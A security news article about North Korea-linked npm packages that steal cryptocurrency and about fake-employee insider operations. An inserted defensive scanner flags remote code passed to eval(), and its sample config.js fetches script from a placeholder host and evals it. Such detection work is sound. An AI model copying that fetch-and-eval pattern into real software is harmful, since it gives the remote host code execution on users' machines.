2024-08-30

Cyber criminals linked to North Korea have been observed publishing a series of malicious packages to the npm registry, indicating “coordinated and relentless” efforts to target developers with malware and steal cryptocurrency assets.

NPM Registry: What is it in a nutshell?

The npm registry (Node Package Manager) is an online platform that hosts packages of JavaScript code.

It is used by developers to share, distribute and manage libraries and code modules that can be easily integrated into their projects.

The npm registry makes it easy to install, update, and manage software dependencies, allowing developers to use pre-existing code to save time and improve application development efficiency.

What is known about the npm attack

The latest wave, observed between August 12 and August 27, 2024, involved packages called temp-etherscan-api, ethersscan-api, telegram-con, helmet-validate, and qq-console.

“The behavior in this campaign leads us to believe that qq-console is attributable to the North Korean campaign known as ‘Contagious Interview’,” software supply chain security firm Phylum said of the npm registry packages.

Contagious Interview refers to an ongoing campaign that aims to compromise software developers with information-stealing malware as part of a supposed job interview process. It involves trying to trick them into downloading fake npm packages or fake installers for video conferencing software like MiroTalk hosted on decoy websites.

The ultimate goal of the attacks is to distribute a Python payload called InvisibleFerret that can exfiltrate sensitive data from browser extensions for cryptocurrency wallets and establish persistence on the system using legitimate remote desktop software like AnyDesk.

CrowdStrike is tracking this activity under the name Famous Chollima.

The new helmet-validate package observed takes a novel approach in that it incorporates a JavaScript code file called config.js that directly executes JavaScript hosted on a remote domain (“ipcheck[.]cloud”) using the function eval().
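A defender-side check for the pattern described above, added here as an example that is not part of the article or of Phylum's tooling: it statically flags JavaScript files in a package that fetch code over the network and hand the response to eval() or new Function(). The sample package and the remote.example hostname are constructed for illustration.

```javascript
// Static heuristic: flag JS files that combine a network fetch with eval()/new Function().
// Input is a map of relative path -> file contents, so the scan runs fully offline.
const EVAL_SINKS = /\b(eval|new\s+Function)\s*\(/g;                      // code-execution sinks
const NET_SOURCES = /\b(https?\.(get|request)|fetch|axios\.(get|post)|request)\s*\(/g; // network sources
const URL_HOST = /https?:\/\/([a-z0-9.-]+)/gi;                            // hostnames referenced

function analyzeFile(path, source) {
  const evals = (source.match(EVAL_SINKS) || []).length;
  const fetches = (source.match(NET_SOURCES) || []).length;
  const hosts = [...new Set([...source.matchAll(URL_HOST)].map((m) => m[1].toLowerCase()))];
  let risk = "none";
  if (evals > 0 && fetches > 0) risk = "high";        // remote content may reach eval()
  else if (evals > 0) risk = "medium";                // eval() of something local
  else if (fetches > 0 && hosts.length > 0) risk = "low"; // network activity, no eval sink
  return { path, evals, fetches, hosts, risk };
}

// Scan every .js/.cjs/.mjs file in the package and keep only files with findings.
function scanPackage(files) {
  return Object.entries(files)
    .filter(([p]) => /\.(c?js|mjs)$/.test(p))
    .map(([p, s]) => analyzeFile(p, s))
    .filter((r) => r.risk !== "none");
}

// Constructed sample package mimicking the described config.js pattern (hostname is a placeholder).
const SAMPLE_PACKAGE = {
  "package.json": JSON.stringify({ name: "sample-validate", main: "index.js" }),
  "index.js": 'require("./config.js");\nmodule.exports = { validate: (h) => typeof h === "object" };',
  "config.js": [
    'const https = require("https");',
    'https.get("https://remote.example/check.js", (res) => {',
    '  let body = "";',
    '  res.on("data", (c) => (body += c));',
    '  res.on("end", () => eval(body));',
    "});",
  ].join("\n"),
};

for (const finding of scanPackage(SAMPLE_PACKAGE)) {
  console.log(JSON.stringify(finding)); // config.js is reported with risk "high"
}
```

A real deployment would run this over the unpacked tarball before the package is allowed into a build, treating "high" as a block and "medium"/"low" as items for review.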

“Our investigation revealed that ipcheck[.]cloud resolves to the same IP address (167[.]88[.]36[.]13) which was resolved by mirotalk[.]net when it was online,” Phylum said, highlighting potential links between the two sets of attacks.

The company also observed another package called sass-notification, uploaded on August 27, 2024, which shared similarities with previously discovered npm libraries such as call-blockflow. These packages have been attributed to another North Korean threat group called Moonstone Sleet.

“These attacks are characterized by the use of obfuscated JavaScript to write and execute batch and PowerShell scripts,” the company said. “The scripts download and decrypt a remote payload, execute it as a DLL, and then attempt to erase all traces of the malicious activity by leaving behind a seemingly benign package on the victim’s machine.”

Hacker Group Famous Chollima Spreads Agents Posing as IT Operators

The disclosure comes as CrowdStrike has linked Famous Chollima (formerly known as BadClone) to insider threat operations that involve infiltrating corporate environments under the cover of legitimate employment.

“Famous Chollima conducted these operations by obtaining contracts or full-time employment, using falsified or stolen identification documents to bypass background checks,” the company said. “When applying for a job, these malicious interns would submit a resume that typically listed previous employment at a major company, as well as other lesser-known companies with no work interruptions.”

While these attacks are primarily financially motivated, a subset of incidents are said to have involved the exfiltration of sensitive information; CrowdStrike said it identified cybercriminals applying for or actively working at more than 100 unique companies in the past year, most of which are located in the United States, Saudi Arabia, France, the Philippines, and Ukraine, among other countries.

The most targeted sectors include technology, fintech, financial services, professional services, retail, transportation, manufacturing, insurance, pharmaceuticals, social media and media companies.

“After gaining access to the victims’ employee-level networks, insiders performed minimal work-related tasks,” the company added. “In some cases, insiders also attempted to exfiltrate data using Git, SharePoint, and OneDrive.”

“Additionally, the insiders installed the following RMM tools: RustDesk, AnyDesk, TinyPilot, VS Code Dev Tunnels, and Google Chrome Remote Desktop. The insiders then used these RMM tools in tandem with corporate network credentials, which allowed numerous IP addresses to connect to the victim’s system.”